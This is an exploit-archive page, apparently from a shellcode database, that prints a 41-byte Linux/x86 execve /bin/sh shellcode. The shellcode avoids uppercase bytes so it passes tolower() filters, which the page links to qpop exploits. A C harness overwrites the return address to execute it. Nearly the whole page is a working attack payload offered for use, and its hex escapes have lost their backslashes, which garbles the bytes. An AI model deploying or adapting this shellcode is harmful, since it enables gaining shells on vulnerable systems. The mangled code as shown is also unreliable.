linux/x86 execve /bin/sh tolower() evasion 41 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86 execve /bin/sh tolower() evasion 41 bytes
# Published : 2004-09-12
# Author : n/a
# Previous Title : linux/x86 execve /bin/sh xor encrypted 55 bytes
# Next Title : linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes

/*
 *  Linux/x86
 *  tolower() evasion, execve() /bin/sh 
 *  (eg use: various qpop exploits)
 */

#include <stdio.h>

char c0de[] =
/* main: */
"xebx1b"                                   /* jmp callz                  */
/* start: */
"x5e"                                       /* popl %esi                  */
"x89xf3"                                   /* movl %esi, %ebx            */
"x89xf7"                                   /* movl %esi, %edi            */
"x83xc7x07"                               /* addl $0x07, %edi           */
"x29xc0"                                   /* subl %eax, %eax            */
"xaa"                                       /* stosb %al, %es:(%edi)      */
"x89xf9"                                   /* movl %edi, %ecx            */
"x89xf0"                                   /* movl %esi, %eax            */
"xab"                                       /* stosl %eax, %es:(%edi)     */
"x89xfa"                                   /* movl %edi, %edx            */
"x29xc0"                                   /* subl %eax, %eax            */
"xab"                                       /* stosl %eax, %es:(%edi)     */
"xb0x08"                                   /* movb $0x08, %al            */
"x04x03"                                   /* addb $0x03, %al            */
"xcdx80"                                   /* int $0x80                  */
/* callz: */
"xe8xe0xffxffxff"                       /* call start                 */
/* DATA */
"/bin/sh";

main() {
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(c0de));
        (*ret) = (int)c0de;
}

// www.Syue.com [2004-09-12]